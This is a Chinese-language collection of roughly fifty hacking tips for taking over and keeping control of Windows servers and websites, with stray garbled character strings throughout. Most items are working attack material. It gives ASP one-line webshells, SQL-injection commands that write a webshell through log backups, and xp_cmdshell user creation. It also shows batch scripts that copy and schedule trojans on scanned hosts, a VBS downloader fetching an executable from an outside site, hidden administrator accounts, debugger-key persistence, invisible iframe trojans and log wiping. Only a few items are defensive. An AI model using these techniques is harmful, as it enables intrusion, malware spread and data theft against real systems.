Xp系统修改权限防止病毒或木马等破坏系统,cmd下,$ k( n( A+ t/ ]; h" N" }8 l
cacls C:\windows\system32 /G hqw20:R
0 f+ j! q( w* S1 O- f/ A; \思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入1 X9 O1 I) J4 p4 W [0 d( u, O: n
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F& f( p( W2 I6 G% ^
( ~7 D+ }' |, _6 m
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。 Z8 V$ y. M0 }+ `/ s2 @6 m: P `2 x
$ z6 }) {2 K6 D; q
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
5 Q D9 M- w$ T! c
# V4 {) ~0 m0 w3 X: K) f& B4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号2 W$ q% J- ^- T7 Q
/ w5 c: N+ w. j3 w0 C( X7 } f! t' ~5、利用INF文件来修改注册表! H: G! s+ d, C$ b- ?% l
[Version]- R. l$ N0 }9 L
Signature="$CHICAGO$"& p1 H! i- L5 V% r1 H
[Defaultinstall]; A( v# R5 [% ^- p& ~
addREG=Ating
2 c% e1 j% I9 f8 G% ?2 I; Q# W[Ating]
0 ?# F/ _% r$ W+ i9 J9 GHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"/ {3 J) |4 e) a( C+ R2 o
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:* V& v% c j+ O7 c5 j# Z
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径1 w( V3 d/ Z2 y0 x) z
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU A+ q) F! |( Z2 f$ u& _+ W5 S+ I
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
0 x& {9 v: N% ^7 U5 ?HKEY_CURRENT_CONFIG 简写为 HKCC' V* I) b# R% L h& r7 n. Q
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值5 s2 B% Z5 l: s2 _8 j
"1"这里代表是写入或删除注册表键值中的具体数据
2 k- W$ B* |' l; C- d$ B7 t1 }8 g/ W5 s) g% P7 A
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
5 d) t0 c) G, s5 u( I多了一步就是在防火墙里添加个端口,然后导出其键值 T9 d" e" l5 g
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
+ O. Y" l9 G- ]: j; I* \8 G5 a, G7 Y9 R& F& p
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽1 u1 v0 J/ O1 x$ h+ Z4 }
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。$ R3 @( B7 m! G: [/ S$ z g
! x& R8 v7 n0 u* F$ Q8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。2 m- j6 r5 I; K( v6 f. E6 p2 z
i1 Q* h( z" T& a+ E2 Y" I9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
2 x `8 Q9 [( J5 c8 V6 n可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。& t! L1 Z" K( c) x1 ^5 K
, K+ g# F0 y1 u/ l* `. I10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
. B7 C/ a0 [, q) [: t7 z) P9 Y# G
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,$ E8 a# w1 a# k, E& [
用法:xsniff –pass –hide –log pass.txt: o& o( X- A# {
8 O( V" i9 A# H0 K12、google搜索的艺术+ ?: k V0 F; @# A% K0 B/ z
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”8 b1 M: v, E% ?; Q1 e' r; |( h. m
或“字符串的语法错误”可以找到很多sql注入漏洞。
. R4 m/ Y9 z4 A
1 H8 k+ k* G7 W6 c; t13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
- r' D+ |" T2 p2 y+ i% q0 z1 c! G, u
+ _1 }, [0 x9 }; m0 s14、cmd中输入 nc –vv –l –p 1987
3 [; }6 _# p" R# G8 u0 n' P做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃; C- b4 @/ a6 w
4 x$ c0 S2 p% G7 p- l' `( S2 y
15、制作T++木马,先写个ating.hta文件,内容为5 y# c, O T$ z
<script language="VBScript">
W- V2 d: o' [set wshshell=createobject ("wscript.shell" )5 t( E7 f$ E @* J& v* X$ }
a=wshshell.run("你马的名称",1)+ m# ~0 U, T! G: U3 w$ L' m
window.close8 }5 D+ g- @3 @7 Z4 p
</script>
6 L$ _7 I- e$ |& F5 F7 P0 U+ b再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
3 y" Y& W2 h! z3 `' B: R
! Q1 U5 g* y& x! H- Y16、搜索栏里输入% _8 d$ G, ^- N7 j k+ W
关键字%'and 1=1 and '%'='
( \0 t% Q7 P, l3 Y/ ^关键字%'and 1=2 and '%'='
- R/ o4 }$ n* w$ a5 N1 A) c比较不同处 可以作为注入的特征字符
* D1 e9 X2 H3 V; [, G- K( x" h. i; w, p( c
17、挂马代码<html>
$ H- [' b$ k2 b f0 Y) x, _<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
, _: i4 L# q8 w- b</html>
& k" B( V$ ~7 x( O6 p0 o: N1 E0 H8 p! b' Y! o
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
- M$ M5 [0 H4 U3 vnet localgroup administrators还是可以看出Guest是管理员来。
8 p" M/ D2 V$ r9 P2 ^
; [0 c8 |/ }8 M5 [7 C19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等/ i5 [1 ~! U; } i4 q. r
用法: 安装: instsrv.exe 服务名称 路径( w. s4 D+ r* Z! k" c8 ?
卸载: instsrv.exe 服务名称 REMOVE
* _. t' n0 R: m8 H- I) m1 ]; j
; ?: Z* a- X M: A8 r5 R# c( E s/ s9 |( v' w
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉# E H" ^% @* w" { a. @- {
不能注入时要第一时间想到%5c暴库。
7 N( @4 \' d {# t( i$ [- M, w0 q. ?; U
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~0 h7 k/ d3 g" I7 r/ Q
4 u/ [6 j" T4 ?* k23、缺少xp_cmdshell时
: p& Z) Y$ x1 x) c+ W9 w% j# I; L尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'6 F( f2 F* Y* t5 S. Z
假如恢复不成功,可以尝试直接加用户(针对开3389的), W# n" [: ^1 Z9 C
declare @o int, u e9 J' i1 P6 G" T, `
exec sp_oacreate 'wscript.shell',@o out4 r/ f0 _9 _# o# z" ?/ k9 H2 h K
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
l0 Z7 t/ y4 R3 a& \) O7 w+ |% S' K, M! y( t. r& j
24.批量种植木马.bat2 u( H7 w! A ~3 l
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
- f8 I9 v3 |; ~& b( L0 m( I9 gfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间 |' F7 U l! l0 B9 S7 Z7 b4 _
扫描地址.txt里每个主机名一行 用\\开头
; x2 z, e' b6 R5 O1 b! I! s; O- U# J m
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。1 F# M' V. L8 c! j" w" v
) @! \# Z; _) c, ^& ?
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
; z2 h5 Z5 O4 o/ a将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
; M8 H% f- u) D' } l8 P" w w% i.cer 等后缀的文件夹下都可以运行任何后缀的asp木马* X Y, I! G3 [' p
; r* ]' W, ~1 v% {$ h) r/ P27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP: k+ z7 s. ~4 I0 c( X" D
然后用#clear logg和#clear line vty *删除日志
" B0 o1 _& s- r0 ^! i9 \4 w( ^2 @1 a$ u, `; i
28、电脑坏了省去重新安装系统的方法
/ Q0 y; H9 b% j7 a" E# U4 |' L纯dos下执行,
: Z2 b& Z# f+ vxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
" u, M$ ?; P# f" ^8 L" Y* }2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config. ?; D) l6 }9 ]* Z+ y
7 J9 ?) p6 e; Z, T% n/ L( }29、解决TCP/IP筛选 在注册表里有三处,分别是:
5 G7 G0 \7 ?3 L8 rHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
% s) o( n" \ z1 u- ]6 m# sHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip; Z q$ ^1 Q+ F+ f7 p0 }
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
7 {" T" L4 q- e* R K7 W分别用
; w1 z. y3 [5 s0 d" L9 jregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
% f! {& R: h" xregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
! ?6 Q) i* C( U+ zregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip1 @$ d2 \/ G' _$ _$ d
命令来导出注册表项! b7 t; r! z+ f5 j! m* |& ~& t
然后把三个文件里的EnableSecurityFilters"=dword:00000001,' v' k5 [; O2 w, b/ k4 s
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
; N5 b( W( ?) @$ k" R2 L; Xregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
; D- Q$ w% H; s2 E- ]9 M
8 S" J% Q2 c6 P5 o* e30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
k+ e v' V/ x) ?2 N! h! mSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3( l$ y3 B+ V9 Z4 [, f, D+ k, |; L9 V
0 e7 T6 j J" e! ]31、全手工打造开3389工具+ b! H7 ~/ X1 [# l% |8 y+ f
打开记事本,编辑内容如下:
9 J3 F7 L+ o0 }echo [Components] > c:\sql! j" i6 r7 M' L8 V
echo TSEnable = on >> c:\sql
% u* r/ P9 u! Jsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
% G* G8 O" h' d% m$ _' V: T编辑好后存为BAT文件,上传至肉鸡,执行
5 o2 l$ q$ a. |8 O+ w8 ^/ X! o5 V3 \. D5 A& W4 a8 ]
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马6 J7 B' Y. u# n$ L
4 [7 S8 E% Z3 t' Z. B6 `
33、让服务器重启$ e5 z! F- E$ B2 j6 p% g/ @- z G
写个bat死循环:
9 g; L+ ?2 d0 Y; Q@echo off3 l* s z1 J, R, u# d7 z4 u
:loop1
. x) K2 M! Y8 f) V- L9 `# ccls4 p) W: y' _+ x" {2 g5 Q
start cmd.exe
2 b* e, J. t* g2 wgoto loop1
. ~4 P( t u! D1 r7 }; Q保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
8 K+ v' e* l1 r- e, L \3 h8 p$ `( [
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
7 D8 c1 N3 n- i9 f( u@echo off# j% D4 |3 X+ C% [7 b1 W
date /t >c:/3389.txt; y. \, s# a! W' W% C: E. z4 R7 B$ P
time /t >>c:/3389.txt: G" ^$ J; c2 A3 [$ S
attrib +s +h c:/3389.bat5 B* S0 O3 f! G6 Q
attrib +s +h c:/3389.txt
( z: F5 w$ M9 F+ {. s4 d/ inetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
' E3 U S' o6 P并保存为3389.bat4 F/ J" t, w; Y0 c3 S) @
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
! ?+ S5 o0 F) m7 `8 q0 r3 w2 s: _% ?* N+ x' m
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
' i( J( k% q$ t4 N. Jstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
, T/ F1 `7 p, C输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。- R& j. r8 {# @ W8 x* q8 @4 Z
0 E' q |1 ?. E* F1 d6 ]# b9 ^36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
* n' [$ M0 h( M( pecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
* [. }4 ~4 U4 l% A4 x3 @echo 你的FTP账号 >>c:\1.bat //输入账号
, h( P& Q5 X1 F2 x4 ^1 wecho 你的FTP密码 >>c:\1.bat //输入密码
5 _& s# k- S9 f% F: }6 Eecho bin >>c:\1.bat //登入+ Z& ] [% E! R. v3 i7 l5 m& Y2 S
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
. t: ]' c8 }% U; T2 C9 wecho bye >>c:\1.bat //退出
2 R2 j O5 Y2 ^" g0 {# u; O然后执行ftp -s:c:\1.bat即可
r$ X! E' |8 t) S3 K% b% [# y3 e* |) d6 B( @
37、修改注册表开3389两法3 t# G/ ~, ^! K
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表7 j9 t4 e, C& H+ o' v& X6 h% U
echo Windows Registry Editor Version 5.00 >>3389.reg, }1 a: ?- Z$ k9 Z% {
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg4 D8 n* Q. L& `: Y/ A' c) t
echo "Enabled"="0" >>3389.reg
0 p/ J5 k/ T5 d( R) z8 Kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
4 K& U& P S% D6 s& xNT\CurrentVersion\Winlogon] >>3389.reg
% _4 w- F* i. \, R& x$ J- r- qecho "ShutdownWithoutLogon"="0" >>3389.reg) K3 g6 f# B% X; n% l
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
- E; }7 D* {( v) `) G, B>>3389.reg
9 h4 ^2 k5 c% Z# e& mecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg& u A# \4 q" U: |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]1 S+ U" V9 T+ N2 f2 c0 ?
>>3389.reg1 W7 ~; Y& r! P/ }: r$ h$ s
echo "TSEnabled"=dword:00000001 >>3389.reg
5 k3 ]* a5 u. Z4 Decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg' ^2 S; S/ p) ]6 W) e
echo "Start"=dword:00000002 >>3389.reg
; q5 V7 @/ U/ F/ A. ]3 recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
$ c$ [, b7 B* M2 ?* U, p>>3389.reg
/ E I0 R3 c: A! P9 k( D2 q0 |9 oecho "Start"=dword:00000002 >>3389.reg# u2 v* i p. v8 p! X. p) Y$ C3 z
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg+ H4 F" U! P! G4 o: S
echo "Hotkey"="1" >>3389.reg* S1 q v! L$ H) z+ R N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% c- M# }. D& q. G. ]. d
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
6 j4 t) w: @0 n' X' G6 w |) Oecho "PortNumber"=dword:00000D3D >>3389.reg
3 |' j; y. v- Q$ ?. [, b/ {( pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 A, \8 a7 C2 R U9 i. |7 o, e3 FServer\WinStations\RDP-Tcp] >>3389.reg
4 t" ?5 L: i* J7 yecho "PortNumber"=dword:00000D3D >>3389.reg
$ \) F' k* f5 r6 {把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。$ S X4 y: f: R: E
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
& L/ N: l/ W N! T& g' w# k6 X因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效' F' S& [; e0 `% `* j) s
(2)winxp和win2003终端开启
# K. |* W8 o7 n. e; m用以下ECHO代码写一个REG文件:
9 Z$ Y- s. L6 v/ Y5 N$ T, gecho Windows Registry Editor Version 5.00>>3389.reg
: F8 q- l; p5 J+ Z8 M4 W; jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
5 y6 Q7 G [4 s A) b9 I2 rServer]>>3389.reg
) |2 F5 x3 l4 i0 E* H* P2 }; z( x/ wecho "fDenyTSConnections"=dword:00000000>>3389.reg% _. S% m' f* y$ v X9 ?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! a) Z9 R, [0 xServer\Wds\rdpwd\Tds\tcp]>>3389.reg
" ?- J2 H3 x0 _. _0 xecho "PortNumber"=dword:00000d3d>>3389.reg$ O$ P( a4 @" A% ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* r6 |) t" k- f8 h3 z; u* UServer\WinStations\RDP-Tcp]>>3389.reg8 ]/ V$ T4 y1 q+ _$ g
echo "PortNumber"=dword:00000d3d>>3389.reg
# c5 g w; w2 d# S, z然后regedit /s 3389.reg del 3389.reg
' l s2 ~" D7 q. p" bXP下不论开终端还是改终端端口都不需重启
9 h) W8 i* b- V/ C/ {' E d% ?! C, n: P
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃5 B! e- Y* H+ ~3 _
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'; p$ n* t/ F7 X1 D. A- M
# N# [7 Y" A; g7 h* B& Y9 Z
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!8 s1 y2 N% s% t. e3 t' V# h
(1)数据库文件名应复杂并要有特殊字符
4 f4 O: _9 _2 s1 V+ ?/ b(2)不要把数据库名称写在conn.asp里,要用ODBC数据源" Y4 ]: M) d; u* g
将conn.asp文档中的 w4 m. z- n9 [ o
DBPath = Server.MapPath("数据库.mdb")( H/ _+ g, e6 x) ^7 f/ W
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
/ b! d$ A0 x( ], J( e" B$ b3 e* r% \# i
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置" w9 S0 F M# y' D
(3)不放在WEB目录里
) f$ K* E" J$ Q/ h% }
5 [. `' a2 L% y. z1 c40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
+ ]" [) b: @3 u( g9 W. T可以写两个bat文件* q; M6 o) D: K( H9 n
@echo off, ~/ x0 i( K$ d3 d
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe2 p0 g$ ?- }; z- }8 R
@del c:\winnt\system32\query.exe/ ]5 D/ w& s Q7 E+ z( S* [. W' }& f
@del %SYSTEMROOT%\system32\dllcache\query.exe M1 f; D5 p4 m
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的4 B+ Q; h3 V+ y) r; V! x: T% A
6 m8 z8 E2 x n& T8 P
@echo off5 e0 z. g5 w3 u7 ^6 \
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
" |# S# J% t f+ z f@del c:\winnt\system32\tsadmin.exe
8 J3 T- z# S3 }; e( M8 x@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex8 s, y! ]# K: e( h. `$ w) i
4 n& R2 q8 V/ U" F+ b
41、映射对方盘符
X7 G1 ~( M8 {" j( |& rtelnet到他的机器上,1 l3 i/ s9 E- D/ k8 j1 O/ m3 K( F
net share 查看有没有默认共享 如果没有,那么就接着运行
9 v! U+ J- e w3 w, F4 snet share c$=c:
& e+ g5 E4 w, N/ D4 W# R% wnet share现在有c$7 R2 N" e3 c# o
在自己的机器上运行
0 n5 C+ z' A" b9 u4 F& x4 xnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
8 m: l! i/ f; Z: H0 }$ m2 D5 r+ ` c7 \/ |9 s/ D
42、一些很有用的老知识
* w& R' S5 P: ?# q4 \0 gtype c:\boot.ini ( 查看系统版本 )! e; @& G4 ]8 u0 B2 a. V
net start (查看已经启动的服务)
6 j3 ?5 M) g$ f4 o& y- [query user ( 查看当前终端连接 ) H" z( F. K; \7 Z% e, W
net user ( 查看当前用户 )
& c! m, t2 ^1 g; {net user 用户 密码/add ( 建立账号 )' [2 x+ U6 D* Z7 o' ^/ i
net localgroup administrators 用户 /add (提升某用户为管理员)
! Q: [5 u# E3 T" P! cipconfig -all ( 查看IP什么的 )1 ?. ?) j$ J- b, ^% o& }
netstat -an ( 查看当前网络状态 )
# {& J+ \4 y& s5 I' u7 D/ Z) ^6 lfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)/ F$ |9 W: J0 o+ S* H/ O4 |
克隆时Administrator对应1F4' C4 O/ u# i; ~' P; T% U
guest对应1F55 l% V% |6 a! f+ {( R" V* y6 _
tsinternetuser对应3E8' L" |/ M% e# X0 }
) L# D4 b7 B- `! K5 \5 }
43、如果对方没开3389,但是装了Remote Administrator Service
3 `# F( ?$ N; o5 U& B) b用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接! A4 t; C: {& g1 v/ K8 r+ d
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
' ]( l6 v3 g. ]; L) u% |( }先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"# i: \7 O9 _3 _7 \0 o# o- ^
# D5 n% C/ [! C1 H5 e. ^
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
2 \! e: A6 O# V/ l2 @5 |% p5 J% L2 Y2 _本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
6 H L! {# Z. g% E$ i5 K1 I7 H- J$ I% A5 [* E+ ^* `
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
, p" y- G$ [2 `7 A% e9 Zecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open7 c. Q7 i1 g! n, Q$ b5 s2 H
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
/ G' g% g1 q+ u& _$ nCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
* S/ L$ B3 V6 O! Q9 r0 Q% R1 ^) t1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
; w8 @& {8 B- w) C- ^(这是完整的一句话,其中没有换行符): L+ x9 J+ E7 U. {* z
然后下载:7 `; F; h3 V# j. c( ]
cscript down.vbs http://www.hack520.org/hack.exe hack.exe2 D$ n+ I5 {. y/ x: V" L' D
$ `1 f5 I5 f2 L. V
46、一句话木马成功依赖于两个条件:, F) y( p' H# d: h
1、服务端没有禁止adodb.Stream或FSO组件
% M8 H9 l; r( j8 U* E2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。; o. K- r8 k4 j: V( Z: d; U
) G5 O4 A* }) \- r
47、利用DB_OWNER权限进行手工备份一句话木马的代码:4 \- U/ o& S- Y' f
;alter database utsz set RECOVERY FULL--
1 X3 c. ]' A: f7 S;create table cmd (a image)--
( s9 K6 D; |5 {0 z;backup log utsz to disk = 'D:\cmd' with init--
5 T9 ?* Q" b: `! E9 \9 i, j;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--6 Y, t* }! u! D' c7 G2 K
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--3 M$ S9 \5 T6 l. \4 P& G
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。, w5 x. K! A. C8 f* C6 E# S
) E: m$ q4 H1 r7 A* ?/ \4 k
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:+ j0 Q$ S% E8 ^/ H: s0 C) d
4 |+ {) E- s8 z8 [7 u" H用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
a" Q4 K) _! Y: m0 k# [所有会话用 'all'。$ Q, `" u; ? r% d/ [& |
-s sessionid 列出会话的信息。
# v- I* u* ~$ s1 s5 L$ z-k sessionid 终止会话。
' m& F9 n7 S# I: D0 Q# B+ W-m sessionid 发送消息到会话。
1 a1 b& s/ J/ f5 |% n- o3 i; ]* m' ?9 b5 u( Y
config 配置 telnet 服务器参数。
5 N8 Q! O' ]9 R ~ Y/ l/ h5 n0 M9 C
common_options 为:, ^$ z: M1 p2 D& t6 x5 h" m I
-u user 指定要使用其凭据的用户
# @8 y. C5 U3 R7 v: J3 D-p password 用户密码; N0 M; C0 F; N
# N$ N) W6 B- d- \% M1 i ^config_options 为:
5 O" B# P! _$ d7 v% C4 U, L3 bdom = domain 设定用户的默认域
4 Z6 _0 e" G. I7 f+ H ?ctrlakeymap = yes|no 设定 ALT 键的映射
2 d+ ]! W2 s8 j ^! F6 Ptimeout = hh:mm:ss 设定空闲会话超时值
j, t) ^; o! N; J, Y* S9 t3 E0 Ktimeoutactive = yes|no 启用空闲会话。
7 Y+ `; v, b& {, ]8 H amaxfail = attempts 设定断开前失败的登录企图数。
8 q+ L7 S( u& A6 G1 i' [maxconn = connections 设定最大连接数。
9 i6 s( |5 Z1 k/ C8 o) C. qport = number 设定 telnet 端口。' t% E. i4 g7 U, j. p, s/ l
sec = [+/-]NTLM [+/-]passwd" w( ~5 B. x, _: o% }4 C
设定身份验证机构
d4 F) O4 A' l2 Tfname = file 指定审计文件名。
4 V# [" h4 V1 h2 ^! | afsize = size 指定审计文件的最大尺寸(MB)。# {1 V0 \/ r, t) h! A/ p
mode = console|stream 指定操作模式。# W' A3 n6 Y+ J5 h0 S, x" X
auditlocation = eventlog|file|both9 M0 \, s4 {: i+ d' y+ V, K; I
指定记录地点5 ?" ]+ `. L2 R+ A5 o
audit = [+/-]user [+/-]fail [+/-]admin
: g$ T1 G; g6 Q4 `5 T
# w2 L' o6 g! ?* S$ j S' U49、例如:在IE上访问:6 }+ K( H, I0 M3 K
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
5 `2 X o! L4 E+ n- ^* S, P# ghack.txt里面的代码是:* M; `" O4 e' t n" Z8 J; M
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">& k1 a/ [9 l- B( O0 A; j
把这个hack.txt发到你空间就可以了!0 l9 I( g: ?. Z$ x% t
这个可以利用来做网马哦!9 ]4 V% y* k! J) i* Q; d, y/ t
4 x w. K% E3 F5 Q* {50、autorun的病毒可以通过手动限制!
7 M% K, X. J2 x% q4 j- j, g; b1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!: v! z8 u- A! A# S
2,打开盘符用右键打开!切忌双击盘符~5 T2 t6 N5 Z& @1 W% C: K
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
g. ^, e9 ?& u0 |/ G7 b3 b( d+ v$ y b0 }' e C
51、log备份时的一句话木马:: D5 n$ R: \. q& Q4 f2 r: O0 G, }
a).<%%25Execute(request("go"))%%25>
4 K9 S; l9 M+ @* db).<%Execute(request("go"))%>
7 Q1 y& S) I; k! L$ G" ^4 M6 {$ x7 tc).%><%execute request("go")%><%
, O6 |( w! ~! Nd).<script language=VBScript runat=server>execute request("sb")</Script>0 e; H4 j, [- {/ c0 K: d7 [, {
e).<%25Execute(request("l"))%25>- ^5 J' L. {. Z+ {0 |7 A
f).<%if request("cmd")<>"" then execute request("pass")%>% p5 _! h) @0 k8 U
. M+ M- K$ H m52、at "12:17" /interactive cmd+ }4 Z* V0 }$ V& I/ ?: u* s; r3 T7 A& T; r+ f
